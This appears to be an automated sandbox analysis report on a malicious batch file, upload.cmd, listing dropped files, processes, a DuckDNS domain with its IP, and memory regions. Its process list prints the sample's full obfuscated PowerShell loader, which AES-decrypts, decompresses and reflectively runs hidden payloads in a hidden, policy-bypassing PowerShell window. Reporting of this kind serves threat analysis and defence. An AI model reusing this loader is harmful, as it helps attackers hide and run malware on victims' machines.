Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
upload.cmd
|
ASCII text, with very long lines (58328), with CRLF line terminators
|
initial sample
|
 |
|
|
\Device\ConDrv
|
ASCII text, with very long lines (1906), with CRLF line terminators
|
dropped
|
|
|
|
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\Critical_powershell.exe_a877394161d3cf447332d615808566972940da62_00000000_d1cd7007-caff-4981-855f-0a14e44e516f\Report.wer
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\Temp\WERDCDF.tmp.WERInternalMetadata.xml
|
XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
|
C:\ProgramData\Microsoft\Windows\WER\Temp\WERDD3D.tmp.xml
|
XML 1.0 document, ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3yorx0ed.msz.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k1c1yq3g.11p.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Windows\appcompat\Programs\Amcache.hve
|
MS Windows registry file, NT/2000 or above
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\upload.cmd" "
|
|
|
|
C:\Windows\System32\cmd.exe
|
cmd /c "set __=^&rem"
|
|
|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create();
$aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;
$aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RzMoOoy2KqgkIwy4RoRfj6IIwcpdKf2HW9dVyZHQs4E='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16]
-join '')('Au8minHRY/Rn0XwxZshhqQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var,
0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){
$gKmLj=New-Object System.IO.MemoryStream(,$param_var); $CUzzM=New-Object System.IO.MemoryStream; $xKhtn=New-Object System.IO.Compression.GZipStream($gKmLj,
[IO.Compression.CompressionMode]::Decompress); $xKhtn.CopyTo($CUzzM); $xKhtn.Dispose(); $gKmLj.Dispose(); $CUzzM.Dispose();
$CUzzM.ToArray();}function execute_function($param_var,$param2_var){ $DUmer=[System.Reflection.Assembly]::('daoL'[-1..-4]
-join '')([byte[]]$param_var); $qdtAj=$DUmer.EntryPoint; $qdtAj.Invoke($null, $param2_var);}$eQNwc = 'C:\Users\user\Desktop\upload.cmd';$host.UI.RawUI.WindowTitle
= $eQNwc;$JWNvA=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($eQNwc).Split([Environment]::NewLine);foreach ($gHmIc
in $JWNvA) { if ($gHmIc.StartsWith('oyDvWzHHEgVkFmqgImzX')) { $PFglM=$gHmIc.Substring(20); break; }}$payloads_var=[string[]]$PFglM.Split('\');$payload1_var=decompress_function
(decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function
(decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function
$payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\wermgr.exe
|
"C:\Windows\system32\wermgr.exe" "-outproc" "0" "5212" "2620" "1284" "2624" "0" "0" "2628" "0" "0" "0" "0" "0"
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://upx.sf.net
|
unknown
|
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
xgmn934.duckdns.org
|
12.202.180.134
|
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
12.202.180.134
|
xgmn934.duckdns.org
|
United States
|
|
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
E4EF936000
|
stack
|
page read and write
|
||
|
2C212420000
|
remote allocation
|
page read and write
|
||
|
2C212420000
|
remote allocation
|
page read and write
|
||
|
2C21084F000
|
heap
|
page read and write
|
||
|
2C2107D0000
|
heap
|
page read and write
|
||
|
2C2108B3000
|
heap
|
page read and write
|
||
|
E4EFDFF000
|
stack
|
page read and write
|
||
|
2C2107D9000
|
heap
|
page read and write
|
||
|
2C210829000
|
heap
|
page read and write
|
||
|
2C210855000
|
heap
|
page read and write
|
||
|
2C210855000
|
heap
|
page read and write
|
||
|
2C2108A0000
|
heap
|
page read and write
|
||
|
2C210822000
|
heap
|
page read and write
|
||
|
2C210B70000
|
heap
|
page read and write
|
||
|
2C210816000
|
heap
|
page read and write
|
||
|
2C2108A0000
|
heap
|
page read and write
|
||
|
2C2108A2000
|
heap
|
page read and write
|
||
|
E4EFC7E000
|
stack
|
page read and write
|
||
|
2C212850000
|
heap
|
page read and write
|
||
|
2C2108A2000
|
heap
|
page read and write
|
||
|
2C2108A0000
|
heap
|
page read and write
|
||
|
2C21086D000
|
heap
|
page read and write
|
||
|
2C210817000
|
heap
|
page read and write
|
||
|
E4EFFFF000
|
stack
|
page read and write
|
||
|
2C210805000
|
heap
|
page read and write
|
||
|
2C21085C000
|
heap
|
page read and write
|
||
|
2C210720000
|
heap
|
page read and write
|
||
|
2C210816000
|
heap
|
page read and write
|
||
|
2C2107B0000
|
heap
|
page read and write
|
||
|
2C210818000
|
heap
|
page read and write
|
||
|
2C210833000
|
heap
|
page read and write
|
||
|
2C210AB4000
|
heap
|
page read and write
|
||
|
E4EFE7B000
|
stack
|
page read and write
|
||
|
2C210730000
|
heap
|
page read and write
|
||
|
2C21086D000
|
heap
|
page read and write
|
||
|
2C2108A2000
|
heap
|
page read and write
|
||
|
2C21080F000
|
heap
|
page read and write
|
||
|
E4EFCFF000
|
stack
|
page read and write
|
||
|
2C210816000
|
heap
|
page read and write
|
||
|
2C210833000
|
heap
|
page read and write
|
||
|
2C2108A2000
|
heap
|
page read and write
|
||
|
2C212420000
|
remote allocation
|
page read and write
|
||
|
E4EFF7B000
|
stack
|
page read and write
|
||
|
E4EFD7C000
|
stack
|
page read and write
|
||
|
2C210750000
|
heap
|
page read and write
|
||
|
2C212320000
|
heap
|
page read and write
|
||
|
2C210821000
|
heap
|
page read and write
|
||
|
2C210B74000
|
heap
|
page read and write
|
||
|
2C210805000
|
heap
|
page read and write
|
||
|
2C210807000
|
heap
|
page read and write
|
||
|
2C21086D000
|
heap
|
page read and write
|
||
|
2C21080F000
|
heap
|
page read and write
|
||
|
2C2108A0000
|
heap
|
page read and write
|
||
|
2C21084F000
|
heap
|
page read and write
|
||
|
2C212500000
|
heap
|
page read and write
|
||
|
2C210837000
|
heap
|
page read and write
|
||
|
2C210837000
|
heap
|
page read and write
|
||
|
2C210819000
|
heap
|
page read and write
|
||
|
2C210AB0000
|
heap
|
page read and write
|
||
|
2C210857000
|
heap
|
page read and write
|
||
|
E4EF9BE000
|
unkown
|
page read and write
|
||
|
2C210816000
|
heap
|
page read and write
|
||
|
2C21086D000
|
heap
|
page read and write
|
||
|
2C210851000
|
heap
|
page read and write
|
||
|
2C210837000
|
heap
|
page read and write
|
||
|
2C21232B000
|
heap
|
page read and write
|
||
|
2C210830000
|
heap
|
page read and write
|
||
|
2C21085D000
|
heap
|
page read and write
|
||
|
2C212950000
|
heap
|
page read and write
|
There are 59 hidden memdumps, click here to show them.